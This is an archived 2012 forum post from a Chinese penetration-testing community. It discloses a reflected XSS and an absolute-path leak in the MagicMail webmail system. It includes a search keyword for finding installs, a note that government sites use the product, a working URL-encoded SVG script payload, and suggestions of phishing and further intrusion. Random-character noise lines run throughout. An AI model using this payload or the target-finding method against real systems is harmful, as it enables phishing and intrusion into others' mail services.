中国网络渗透测试联盟
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 20:38
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
) r9 s$ g3 A" e% L( F2 }
( l1 q' N0 W+ ~- w
; U$ b0 h8 ?. m3 g
包含 一个反射性XSS 以及 绝对路径泄漏
" Y4 V% ^+ X9 Z9 h6 a6 ]8 ~* o
看了看 貌似全部是linux的。
+ G$ p5 {. a. ~5 X0 i6 |
1 N/ j. G4 t3 m& z0 |9 N
关键字:迈捷邮件系统 by MagicMail
5 F7 t% \" `2 x* N u
( j0 _5 f3 M* N& O6 g) |# @, Z
可以看到很多政府网站都用这个邮件系统
% b% ?; x1 W: H% C2 f
0 T# p" \0 ~" a" S
绝对路径
http://madman.in/index.php?login_type=declare&language=
3 M( z% _/ |% u" V3 b& V! f3 I
: l7 k. x& \7 Y/ O! u( f( g; ?6 R
3 f! L ]7 N# i5 F. M a, F- Q
/ P5 ^, X( r9 K: J0 L" K" w7 H: T" C
XSS:
http://madman.in/index.php?login_type=declare&language=
–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
0 I f5 ]# D, U3 g, y( M/ `
/ D$ M; [. E+ Z4 ]6 t+ e
' a) D" N1 A) M8 X" v% J
" E2 j- ~& l( h5 z; X% D9 z2 ?
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
: P5 M. \ c: O* x% y( e
5 T: f" K6 L. z
修复方案:看官方补丁吧。
$ h1 |4 o0 k1 H* w
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2